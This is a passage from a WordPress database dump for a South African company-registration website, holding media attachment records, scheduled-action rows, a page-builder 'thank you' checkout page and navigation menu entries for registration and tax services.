20:51:22','',0,'https://companyregistration.online/wp-content/uploads/2019/07/CoReg-Insane-Offer-Conversion-Ad.jpg',0,'attachment','image/jpeg',0),(32959,0,'2019-08-19 01:40:10','2019-08-19 01:40:10','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d59ffb4350f76.92186523-5lAaeFNn0lavQeDjIuG6Nun7vQX4R2u3','','','2019-08-19 03:47:32','2019-08-19 01:47:32','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32959',0,'scheduled-action','',3),(32961,0,'2019-08-19 02:47:32','2019-08-19 02:47:32','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a100971dd25.10984238-p6Bg7fgWqlWJIAnbgXqBKFIqNNV8oVUb','','','2019-08-19 04:57:13','2019-08-19 02:57:13','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32961',0,'scheduled-action','',3),(31390,1,'2019-07-18 23:55:10','2019-07-18 21:55:10','[et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|phone\" _builder_version=\"3.26.3\" background_color=\"#faf9ff\" custom_margin=\"-230px||||false|false\" custom_padding=\"25px||140px\" custom_padding_tablet=\"50px||50px\" custom_padding_phone=\"30px||30px\"][et_pb_row custom_padding=\"0px||0px||true\" custom_margin=\"0px||0px||true\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_code admin_label=\"Note: Important Styling (Don\'t Remove or you can do CSS customization here)\" _builder_version=\"3.19.9\" custom_margin=\"0px||0px||true\" custom_padding=\"0px||0px||true\"]<style><!-- [et_pb_line_break_holder] -->body {<!-- [et_pb_line_break_holder] -->	font-weight: 400;<!-- [et_pb_line_break_holder] -->}<!-- [et_pb_line_break_holder] -->.et_fixed_nav.et_show_nav #page-container, .et_non_fixed_nav.et_transparent_nav.et_show_nav #page-container {<!-- [et_pb_line_break_holder] -->    padding-top: 0;<!-- [et_pb_line_break_holder] -->}<!-- [et_pb_line_break_holder] -->.vertical-align-middle {<!-- [et_pb_line_break_holder] -->	align-items:center;<!-- [et_pb_line_break_holder] -->	align-self:center;<!-- [et_pb_line_break_holder] -->}<!-- [et_pb_line_break_holder] --></style>[/et_pb_code][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Thank You \" use_icon=\"on\" font_icon=\"%%202%%\" icon_color=\"#61ce70\" content_max_width=\"648px\" admin_label=\"Headline: Thank you\" _builder_version=\"3.26.3\" header_font=\"Poppins||||||||\" header_text_color=\"#e03d52\" header_font_size=\"50px\" body_font=\"Poppins||||||||\" body_text_color=\"rgba(0,0,0,0.55)\" body_font_size=\"20px\" text_orientation=\"center\" header_font_size_tablet=\"24px\" header_font_size_last_edited=\"on|phone\"]<p><strong>Congratulations</strong>, you have taken a bold step.</p>\r\n<p>It\'s being proven time and time again that the best returns on any investment comes from a well run business.</p>\r\n<p><strong>Check your email for the details on what to do next</strong></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"2_3,1_3\" _builder_version=\"3.25\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Confirmation on what you will receive\" content_max_width=\"648px\" admin_label=\"Headline: Thank you\" _builder_version=\"3.26.3\" header_font=\"Poppins|600|||||||\" header_text_color=\"#e03d52\" header_font_size=\"20px\" body_font=\"Poppins||||||||\" body_text_color=\"rgba(0,0,0,0.55)\" body_ul_font=\"||||||||\" body_ul_line_height=\"1.7em\" header_font_size_tablet=\"24px\" header_font_size_last_edited=\"on|phone\"]<ul>\r\n<li>- Name reservation based on <span data-dobid=\"hdw\">dissimilar</span> names</li>\r\n<li>- Registered company</li>\r\n<li>- Tax Clearance, if required</li>\r\n</ul>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/06/companyregistration-web.png\" _builder_version=\"3.26.3\" custom_padding=\"25px||||false|false\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.26.3\"][et_pb_column type=\"4_4\" _builder_version=\"3.26.3\"][et_pb_text _builder_version=\"3.26.3\" text_font=\"Poppins||||||||\" custom_margin=\"-25px||-33px||false|false\"]<p style=\"text-align: center;\"><em><strong>Our office number is 010 592 7717 should you have any questions, ask for a registration consultant</strong></em></p>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.22\" background_color=\"#ffffff\" custom_padding=\"2px||50px\"][et_pb_row custom_padding=\"50px|20px|50px|20px|true|true\" custom_margin=\"-90px||\" _builder_version=\"3.25\" background_color=\"#ffffff\" border_radii=\"on|3px|3px|3px|3px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"0px\" box_shadow_blur=\"20px\" box_shadow_color=\"rgba(0,0,0,0.1)\" max_width=\"880px\" custom_margin_tablet=\"-60px||\" custom_margin_phone=\"-30px||\" custom_margin_last_edited=\"on|phone\" use_custom_width=\"on\" custom_width_px=\"880px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_code admin_label=\"Order Details Shortcode\" _builder_version=\"3.19.11\"][cartflows_order_details][/et_pb_code][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"3_5,2_5\" custom_padding=\"35px|20px|35px|20px|true|true\" custom_margin=\"30px||\" _builder_version=\"3.25\" border_radii=\"on|3px|3px|3px|3px\" max_width=\"880px\" use_custom_width=\"on\" custom_width_px=\"880px\"][et_pb_column type=\"3_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text disabled_on=\"on|on|off\" admin_label=\"Headline: Join Our Community\" _builder_version=\"3.19.11\" text_font=\"Poppins||||||||\" text_text_color=\"#7a7a7a\" header_font=\"||||||||\" header_2_font=\"Poppins|700|||||||\" header_2_text_align=\"left\" header_2_text_color=\"#54595f\" header_2_font_size=\"22px\" module_alignment=\"right\" header_2_font_size_tablet=\"22px\" header_2_font_size_phone=\"24px\" header_2_font_size_last_edited=\"on|tablet\"]<h2>Join Our Community</h2>\r\nClick edit button to change this text. Lorem ipsum dolor sit amet,[/et_pb_text][/et_pb_column][et_pb_column type=\"2_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_social_media_follow _builder_version=\"3.19.9\" text_orientation=\"center\"][et_pb_social_media_follow_network social_network=\"facebook\" _builder_version=\"3.19.9\" background_color=\"#3b5998\" border_radii=\"on|5px|5px|5px|5px\" custom_padding=\"5px|5px|5px|5px|true|true\" follow_button=\"off\" url_new_window=\"on\"]facebook[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"twitter\" _builder_version=\"3.19.9\" background_color=\"#00aced\" border_radii=\"on|5px|5px|5px|5px\" custom_padding=\"5px|5px|5px|5px|true|true\" follow_button=\"off\" url_new_window=\"on\"]twitter[/et_pb_social_media_follow_network][et_pb_social_media_follow_network social_network=\"google-plus\" _builder_version=\"3.19.9\" background_color=\"#dd4b39\" border_radii=\"on|5px|5px|5px|5px\" custom_padding=\"5px|5px|5px|5px|true|true\" follow_button=\"off\" url_new_window=\"on\"]google-plus[/et_pb_social_media_follow_network][/et_pb_social_media_follow][/et_pb_column][/et_pb_row][/et_pb_section]','Thank You CoReg','','publish','closed','closed','','thank-you-coreg','','','2019-07-22 11:31:18','2019-07-22 09:31:18','',0,'https://companyregistration.online/thank-you-2/',0,'cartflows_step','',0),(32963,0,'2019-08-19 03:57:13','2019-08-19 03:57:13','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a2009b1f5a5.69772509-b8sZ6CbvQhz7T4MVL2ibeWsifuTqckmB','','','2019-08-19 06:05:29','2019-08-19 04:05:29','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32963',0,'scheduled-action','',3),(32965,0,'2019-08-19 05:05:29','2019-08-19 05:05:29','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a3668355b93.24128363-dQt4yULW2mlijB5oiRlL3LUkOo0sV0ML','','','2019-08-19 07:40:56','2019-08-19 05:40:56','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32965',1,'scheduled-action','',3),(32966,0,'2019-08-19 05:05:29','2019-08-19 05:05:29','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a366865c2a1.64834845-KwY5ygH4wUWtxsGYgxxMoAwWVOMJyveA','','','2019-08-19 07:40:56','2019-08-19 05:40:56','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32966',1,'scheduled-action','',3),(32968,0,'2019-08-19 06:40:56','2019-08-19 06:40:56','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a44979a41f3.57314188-Rqb1PmosVDuEmUvrGpRyXctjDUoITDyh','','','2019-08-19 08:41:27','2019-08-19 06:41:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32968',0,'scheduled-action','',3),(32969,0,'2019-08-19 07:41:27','2019-08-19 07:41:27','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a52ec4d0f18.87061153-ybda0qtiOZDh8peCmnoO9P3dQy3Jq9eF','','','2019-08-19 09:42:36','2019-08-19 07:42:36','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32969',0,'scheduled-action','',3),(32967,0,'2019-08-19 06:40:56','2019-08-19 06:40:56','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a449774e675.08490270-ReK6CiRoSRzbDz9ZomCtDTh88SvqKV2q','','','2019-08-19 08:41:27','2019-08-19 06:41:27','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32967',0,'scheduled-action','',3),(32980,0,'2019-08-19 09:43:04','2019-08-19 09:43:04','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a7014bf6387.13180504-CwkHl8qhMIDimE0v81nPurLqXxSF2O3b','','','2019-08-19 11:47:00','2019-08-19 09:47:00','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32980',0,'scheduled-action','',3),(32982,0,'2019-08-19 10:47:00','2019-08-19 10:47:00','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a7e2662e274.32331293-iUxxz1XM8OxWTCmA2Tn5IBv8iXL6uTp6','','','2019-08-19 12:47:02','2019-08-19 10:47:02','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32982',0,'scheduled-action','',3),(32984,0,'2019-08-19 11:47:02','2019-08-19 11:47:02','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a8d9a4236c3.91396796-GSYBnvrP0inVTrqzPmxKxNbPZ09gYCov','','','2019-08-19 13:52:58','2019-08-19 11:52:58','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32984',1,'scheduled-action','',3),(32991,0,'2019-08-19 12:52:58','2019-08-19 12:52:58','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5aa399a11d77.06599048-MYKfcNFvdDbwUlDNyidwzbNNgw9WtOgx','','','2019-08-19 15:26:49','2019-08-19 13:26:49','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32991',1,'scheduled-action','',3),(32995,0,'2019-08-19 15:44:49','2019-08-19 15:44:49','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5ac46b4c2020.79340986-uRaXUXu6uPmZmJXIGsBjgNweXFPZeoVI','','','2019-08-19 17:46:51','2019-08-19 15:46:51','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32995',0,'scheduled-action','',3),(32997,0,'2019-08-19 16:46:51','2019-08-19 16:46:51','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5ad644b27111.48705588-KPHz80XyYPXg0WxarmVNaNqG4pGYGIej','','','2019-08-19 19:03:00','2019-08-19 17:03:00','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32997',0,'scheduled-action','',3),(32970,0,'2019-08-19 07:41:27','2019-08-19 07:41:27','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a52ec5d8ab4.66138089-UOks9xrSl8vZsvhWpFotnFCiKSBzVA8U','','','2019-08-19 09:42:36','2019-08-19 07:42:36','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32970',0,'scheduled-action','',3),(32981,0,'2019-08-19 09:43:04','2019-08-19 09:43:04','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a70150a7c50.66758540-lmPoPU6OLuWDmnQrwNGEoPus12GQD7nL','','','2019-08-19 11:47:01','2019-08-19 09:47:01','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32981',0,'scheduled-action','',3),(32983,0,'2019-08-19 10:47:01','2019-08-19 10:47:01','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a7e268a1e63.30435055-67t979WnYzAFI1BFhxgsufA6zUlwNlMv','','','2019-08-19 12:47:02','2019-08-19 10:47:02','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32983',0,'scheduled-action','',3),(32985,0,'2019-08-19 11:47:02','2019-08-19 11:47:02','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5a8d9a540cb5.64329230-689XGfYDNRBgMb7piXAsFLDtXqG7sDVB','','','2019-08-19 13:52:58','2019-08-19 11:52:58','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32985',1,'scheduled-action','',3),(32992,0,'2019-08-19 12:52:58','2019-08-19 12:52:58','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5aa399cbc4e2.43765946-QH5EpMEdDoVDByhZvyB9uDFFbpSmGj8L','','','2019-08-19 15:26:49','2019-08-19 13:26:49','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32992',1,'scheduled-action','',3),(32999,0,'2019-08-19 18:03:00','2019-08-19 18:03:00','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5aeb9c023448.52432478-dRbmLH4MeoVGpYeyDS0bimQltp0Cl2iq','','','2019-08-19 20:34:04','2019-08-19 18:34:04','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=32999',0,'scheduled-action','',3),(33001,0,'2019-08-19 19:34:04','2019-08-19 19:34:04','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5afab2548af1.91624244-O4rVrnrGs6BBac18hBjkaPAPyEfizii6','','','2019-08-19 21:38:26','2019-08-19 19:38:26','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33001',1,'scheduled-action','',3),(33003,0,'2019-08-19 20:38:26','2019-08-19 20:38:26','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b09b97b2df8.92095984-T8IFsn7Ae1qsd6KGNa2Pu7cC7YJASjCn','','','2019-08-19 22:42:33','2019-08-19 20:42:33','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33003',1,'scheduled-action','',3),(33005,0,'2019-08-19 21:42:33','2019-08-19 21:42:33','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b197a58dfb6.27611166-f1AzwZdjXO4kMQntygJUlYKfRP4XGeeP','','','2019-08-19 23:49:46','2019-08-19 21:49:46','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33005',1,'scheduled-action','',3),(33007,0,'2019-08-19 22:49:46','2019-08-19 22:49:46','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b2e1751ee05.93206860-K2iPJTR9C9XlB9Ujc62JNBB1vsfgQYnU','','','2019-08-20 01:17:43','2019-08-19 23:17:43','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33007',1,'scheduled-action','',3),(33009,0,'2019-08-20 00:17:43','2019-08-20 00:17:43','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b50261e8084.63624432-7XoZPVXlpnKZTovzNjtZ2xw0IzNMBvVu','','','2019-08-20 03:43:02','2019-08-20 01:43:02','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33009',1,'scheduled-action','',3),(33011,0,'2019-08-20 02:43:02','2019-08-20 02:43:02','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b63f7ead132.42498111-modrIRMcpDtiI6zcIkP3gJgXhGX7Gg1v','','','2019-08-20 05:07:35','2019-08-20 03:07:35','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33011',1,'scheduled-action','',3),(33013,0,'2019-08-20 04:07:35','2019-08-20 04:07:35','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b7944ef1a30.40631214-YlEH9zSlE9gRCnrtAfhBy1MwSFJAbF4L','','','2019-08-20 06:38:28','2019-08-20 04:38:28','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33013',1,'scheduled-action','',3),(33015,0,'2019-08-20 05:38:29','2019-08-20 05:38:29','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5b8d6cd96fa8.53644679-4PakmAMumHMTtkdaQY5Dgr7gJwoE0jDr','','','2019-08-20 08:04:28','2019-08-20 06:04:28','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33015',1,'scheduled-action','',3),(33017,0,'2019-08-20 07:04:29','2019-08-20 07:04:29','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5ba503869a29.27832237-XjTgVBR7vuxhXhqQtbsKvxcDzg17yyDS','','','2019-08-20 09:45:07','2019-08-20 07:45:07','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33017',1,'scheduled-action','',3),(33019,0,'2019-08-20 08:45:07','2019-08-20 08:45:07','[]','wc_admin_unsnooze_admin_notes','','publish','open','closed','','scheduled-action-5d5bb80c1a0378.57018028-tfxic7upJz3RWppTQVS6SDvIzregS9DW','','','2019-08-20 11:06:20','2019-08-20 09:06:20','',0,'https://companyregistration.online/?post_type=scheduled-action&#038;p=33019',1,'scheduled-action','',3),(31208,3,'2019-06-18 10:54:49','2019-06-18 08:54:49','','Mastercard horizontal-01','','inherit','open','closed','','mastercard-horizontal-01','','','2019-06-18 10:54:49','2019-06-18 08:54:49','',0,'https://companyregistration.online/wp-content/uploads/2019/06/Mastercard-horizontal-01.png',0,'attachment','image/png',0),(31209,3,'2019-06-18 10:54:53','2019-06-18 08:54:53','','Mastercard horizontal-02','','inherit','open','closed','','mastercard-horizontal-02','','','2019-06-18 10:54:53','2019-06-18 08:54:53','',0,'https://companyregistration.online/wp-content/uploads/2019/06/Mastercard-horizontal-02.png',0,'attachment','image/png',0),(31210,3,'2019-06-18 10:55:00','2019-06-18 08:55:00','','masterpass 1','','inherit','open','closed','','masterpass-1','','','2019-06-18 10:55:00','2019-06-18 08:55:00','',0,'https://companyregistration.online/wp-content/uploads/2019/06/masterpass-1.png',0,'attachment','image/png',0),(31211,3,'2019-06-18 10:55:06','2019-06-18 08:55:06','','masterpass 2','','inherit','open','closed','','masterpass-2','','','2019-06-18 10:55:06','2019-06-18 08:55:06','',0,'https://companyregistration.online/wp-content/uploads/2019/06/masterpass-2.png',0,'attachment','image/png',0),(31212,3,'2019-06-18 10:55:10','2019-06-18 08:55:10','','Mobicred','','inherit','open','closed','','mobicred','','','2019-06-18 10:55:10','2019-06-18 08:55:10','',0,'https://companyregistration.online/wp-content/uploads/2019/06/Mobicred.png',0,'attachment','image/png',0),(31215,3,'2019-06-18 10:55:52','2019-06-18 08:55:52','','Visa Electron','','inherit','open','closed','','visa-electron','','','2019-06-18 10:55:52','2019-06-18 08:55:52','',0,'https://companyregistration.online/wp-content/uploads/2019/06/Visa-Electron.png',0,'attachment','image/png',0),(31216,3,'2019-06-18 10:56:12','2019-06-18 08:56:12','','Visa','','inherit','open','closed','','visa','','','2019-06-18 10:56:12','2019-06-18 08:56:12','',0,'https://companyregistration.online/wp-content/uploads/2019/06/Visa.png',0,'attachment','image/png',0),(31217,3,'2019-06-18 10:56:23','2019-06-18 08:56:23','','bitcoin','','inherit','open','closed','','bitcoin','','','2019-06-18 10:56:23','2019-06-18 08:56:23','',0,'https://companyregistration.online/wp-content/uploads/2019/06/bitcoin.png',0,'attachment','image/png',0),(31218,3,'2019-06-18 10:56:26','2019-06-18 08:56:26','','Instant EFT by Payfast','','inherit','open','closed','','instant-eft-by-payfast','','','2019-06-18 10:56:26','2019-06-18 08:56:26','',0,'https://companyregistration.online/wp-content/uploads/2019/06/Instant-EFT-by-Payfast.png',0,'attachment','image/png',0),(31219,3,'2019-06-18 10:56:31','2019-06-18 08:56:31','','Maestro','','inherit','open','closed','','maestro','','','2019-06-18 10:56:31','2019-06-18 08:56:31','',0,'https://companyregistration.online/wp-content/uploads/2019/06/Maestro.png',0,'attachment','image/png',0),(31227,3,'2019-06-18 11:32:59','2019-06-18 09:32:59','','Non Profit Organisation','','publish','closed','closed','','non-profit-organisation','','','2019-06-18 11:33:27','2019-06-18 09:33:27','',0,'https://companyregistration.online/?p=31227',5,'nav_menu_item','',0),(31238,3,'2019-06-18 12:31:06','2019-06-18 10:31:06','','Company Registrations','','publish','closed','closed','','company-registrations','','','2019-07-18 16:03:40','2019-07-18 14:03:40','',0,'https://companyregistration.online/?p=31238',1,'nav_menu_item','',0),(31239,3,'2019-06-18 12:31:06','2019-06-18 10:31:06','','Private Company','','publish','closed','closed','','private-company','','','2019-07-18 16:03:40','2019-07-18 14:03:40','',0,'https://companyregistration.online/?p=31239',2,'nav_menu_item','',0),(31240,3,'2019-06-18 12:31:06','2019-06-18 10:31:06','','Personal Liability Company','','publish','closed','closed','','personal-liability-company','','','2019-07-18 16:03:40','2019-07-18 14:03:40','',0,'https://companyregistration.online/?p=31240',3,'nav_menu_item','',0),(31241,3,'2019-06-18 12:31:06','2019-06-18 10:31:06','','Private Company Customized MOI','','publish','closed','closed','','private-company-customized-moi','','','2019-07-18 16:03:40','2019-07-18 14:03:40','',0,'https://companyregistration.online/?p=31241',4,'nav_menu_item','',0),(31242,3,'2019-06-18 12:31:06','2019-06-18 10:31:06','','Tax Registration','','publish','closed','closed','','tax-registration','','','2019-07-18 16:03:40','2019-07-18 14:03:40','',0,'https://companyregistration.online/?p=31242',5,'nav_menu_item','',0),(31243,3,'2019-06-18 12:31:06','2019-06-18 10:31:06','','Urgent Vat Registration','','publish','closed','closed','','urgent-vat-registration','','','2019-07-18 16:03:40','2019-07-18 14:03:40','',0,'https://companyregistration.online/?p=31243',6,'nav_menu_item','',0),(31244,3,'2019-06-18 12:31:06','2019-06-18 10:31:06','','Salary Tax Registration PAYE','','publish','closed','closed','','salary-tax-registration-paye','','','2019-07-18 16:03:40','2019-07-18 14:03:40','',0,'https://companyregistration.online/?p=31244',7,'nav_menu_item','',0),(31245,3,'2019-06-18 12:31:06','2019-06-18 10:31:06','','Tax Clearance Certificate','','publish','closed','closed','','tax-clearance-certificate','','','2019-07-18 16:03:40','2019-07-18 14:03:40','',0,'https://companyregistration.online/?p=31245',8,'nav_menu_item','',0),(31246,3,'2019-06-18 12:31:06','2019-06-18 10:31:06','','Business Income Tax Registration','','publish','closed','closed','','business-income-tax-registration','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31246',9,'nav_menu_item','',0),(31247,3,'2019-06-18 12:31:06','2019-06-18 10:31:06','','Import & Export Code Registration','','publish','closed','closed','','import-export-code-registration','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31247',10,'nav_menu_item','',0),(31248,3,'2019-06-18 12:31:06','2019-06-18 10:31:06','','Vat Registration','','publish','closed','closed','','vat-registration','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31248',11,'nav_menu_item','',0),(31251,3,'2019-06-18 12:56:37','2019-06-18 10:56:37','','Maintaining Your Company','','publish','closed','closed','','maintaining-your-company','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31251',12,'nav_menu_item','',0),(31252,3,'2019-06-18 12:56:37','2019-06-18 10:56:37','','Annual Returns','','publish','closed','closed','','annual-returns','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31252',13,'nav_menu_item','',0),(31253,3,'2019-06-18 12:56:37','2019-06-18 10:56:37','','Change In Director/s','','publish','closed','closed','','change-in-director-s','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31253',14,'nav_menu_item','',0),(31254,3,'2019-06-18 12:56:37','2019-06-18 10:56:37','','Change In CC Members','','publish','closed','closed','','change-in-cc-members','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31254',15,'nav_menu_item','',0),(31255,3,'2019-06-18 12:56:37','2019-06-18 10:56:37','','Change In Closed Corporation Address','','publish','closed','closed','','change-in-closed-corporation-address','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31255',16,'nav_menu_item','',0),(31256,3,'2019-06-18 12:56:37','2019-06-18 10:56:37','','Change In Company Address','','publish','closed','closed','','change-in-company-address','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31256',17,'nav_menu_item','',0),(31257,3,'2019-06-18 12:56:37','2019-06-18 10:56:37','','Company & Closed Corporation Restorations','','publish','closed','closed','','company-closed-corporation-restorations','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31257',18,'nav_menu_item','',0),(31258,3,'2019-06-18 12:56:37','2019-06-18 10:56:37','','BEE Requirements','','publish','closed','closed','','bee-requirements','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31258',20,'nav_menu_item','',0),(31259,3,'2019-06-18 12:56:37','2019-06-18 10:56:37','','BEE Affidavit','','publish','closed','closed','','bee-affidavit','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31259',21,'nav_menu_item','',0),(31260,3,'2019-06-18 12:56:38','2019-06-18 10:56:38','','Business Tools','','publish','closed','closed','','business-tools','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31260',22,'nav_menu_item','',0),(31261,3,'2019-06-18 12:56:38','2019-06-18 10:56:38','','Cloud Accounting','','publish','closed','closed','','cloud-accounting','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31261',23,'nav_menu_item','',0),(31262,3,'2019-06-18 12:56:38','2019-06-18 10:56:38','','Zoho Books Annual','','publish','closed','closed','','zoho-books-annual','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31262',24,'nav_menu_item','',0),(31263,3,'2019-06-18 12:56:38','2019-06-18 10:56:38','','What I need to know before I start my business in SA','','publish','closed','closed','','what-i-need-to-know-before-i-start-my-business-in-sa','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31263',25,'nav_menu_item','',0),(31264,3,'2019-06-18 12:56:38','2019-06-18 10:56:38','','Combo Deals','','publish','closed','closed','','combo-deals','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31264',26,'nav_menu_item','',0),(31265,3,'2019-06-18 12:56:38','2019-06-18 10:56:38','','Basic Bundle','','publish','closed','closed','','basic-bundle','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31265',27,'nav_menu_item','',0),(31266,3,'2019-06-18 12:56:38','2019-06-18 10:56:38','','Gold Bundle','','publish','closed','closed','','gold-bundle','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31266',28,'nav_menu_item','',0),(31267,3,'2019-06-18 12:56:38','2019-06-18 10:56:38','','Business Professional','','publish','closed','closed','','business-professional','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31267',29,'nav_menu_item','',0),(31268,3,'2019-06-18 12:56:38','2019-06-18 10:56:38','','Tender Ready','','publish','closed','closed','','tender-ready','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31268',30,'nav_menu_item','',0),(31269,3,'2019-06-18 13:31:07','2019-06-18 11:31:07','','FAQ','','publish','closed','closed','','faq','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31269',31,'nav_menu_item','',0),(31271,3,'2019-06-18 13:31:07','2019-06-18 11:31:07','','Company Registration FAQ','','publish','closed','closed','','company-registration-faq','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31271',32,'nav_menu_item','',0),(31272,3,'2019-06-18 13:31:07','2019-06-18 11:31:07','','Annual Returns','','publish','closed','closed','','annual-returns-2','','','2019-07-18 16:03:41','2019-07-18 14:03:41','',0,'https://companyregistration.online/?p=31272',33,'nav_menu_item','',0),(31273,3,'2019-06-18 13:31:07','2019-06-18 11:31:07','','Restoration Of A Company Or Closed Corporation','','publish','closed','closed','','restoration-of-a-company-or-closed-corporation','','','2019-07-18 16:03:41','2019-07-18 